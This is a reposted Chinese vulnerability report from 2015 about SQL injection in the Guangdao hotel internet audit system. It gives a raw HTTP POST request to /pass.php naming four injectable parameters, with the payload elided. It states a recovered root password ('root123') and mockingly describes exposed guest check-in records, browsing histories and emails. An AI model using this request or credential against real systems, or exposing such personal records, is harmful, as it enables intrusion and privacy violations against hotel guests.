广道审计系统SQL注入漏洞可致敏感信息泄露 - 网-自学php网

主页 > 后端 > 网站安全 >

广道审计系统SQL注入漏洞可致敏感信息泄露 - 网

来源：自学PHP网时间：2015-04-16 23:15 作者：阅读:次

[导读] 广道审计系统公司为：深圳市高新技术有限公司详细说明：广道审计系统公司为：深圳市高新技术有限公司有较多酒店系统采用。该硬件审计系统某页面由于未做过滤，导致存在N个S...

广道审计系统
公司为：深圳市高新技术有限公司

广道审计系统

公司为：深圳市高新技术有限公司

有较多酒店系统采用。

该硬件审计系统某页面由于未做过滤，导致存在N个SQL注入漏洞

其中参数为：Idcard ，mobile ，password ，room

上面4个SQL注入漏洞，我选取其中一个注入做为例子

POST /pass.php HTTP/1.1
Content-Length: 188
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.100.235:1234/index.php
Cookie: PHPSESSID=2d93e8aa3df024e3942c0ff3a11fbad7
Host: 192.168.100.235:1234
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

button=1&guest_name=ucvbadlr&idcard=1&mobile=**&password=&type=4

C2_EZ823G}BR3OE7ADZLV(5.jpg

2W9W@)9ASV@AJPC`_MLW1TS.jpg

SD@LE9RQG`RWPR)}9H}BN9V.jpg

root密码解密为： root123

$}7JF9@RRKLR{}SK{[ET_$W8.jpg$

OE)FNNYSMFTM@Y{(`18J7Y2.jpg

WJAA8X{931OZ5XS${FZ4CUD.jpg

看看这些开房的

IUN(Q8MY9Y$T@}GX]FBYAX3.jpg

看看你上过的哪些网页

T95EZB@99N}TW{(G9]`83DH.jpg

下载记录

1`%X@~WXR071OCC_BSU5UJ4.jpg

是所有监控上网记录。

还有大量邮箱。。。

N%3}{5IO5M2QK{Z1H)]WELV.jpg

看看你在酒店下载过什么片？（快播）看看你提交了哪些post请求。。。。

漏洞证明：

大朴网越权之取消任意用户订单 - 网站安全 - 自

淘宝官网某处接口泄露用户淘宝ID和部分COOKIE -

最新评论

加载更多~~

添加评论

更多文章推荐

ADSL宽带拨号密码的多种恢复方法经验谈 - Window 2015-04-17
探测网站(三)nikto探测Web服务器漏洞 - 网站安全 2015-04-17
腾讯微博一处两用DOM-XSS，能反射，能后门 - 网站 2015-04-17
浅谈新型的sql注入测试 - 网站安全 - 自学php 2015-04-17
58同城逻辑判断失误致任意信息删除漏洞 - 网站安 2015-04-17
通达OA2007版本漏洞及getshell - 网站安全 - 自学p 2015-04-17
bo-blog存在反射型XSS - 网站安全 - 自学php 2015-04-17
ShyPost企业网站管理系统V4.3注入XSS漏洞及后台拿 2015-04-17
金山某数据库服务器沦陷 - 网站安全 - 自学php 2015-04-17
Windows2003关闭文件保护功能 - Windows操作系统 - 自 2015-04-17

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习，以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明：本站所有视频，教程都由网友上传，站长收集和分享给大家学习使用，如由牵扯版权问题请联系站长邮箱904561283@qq.com



添加评论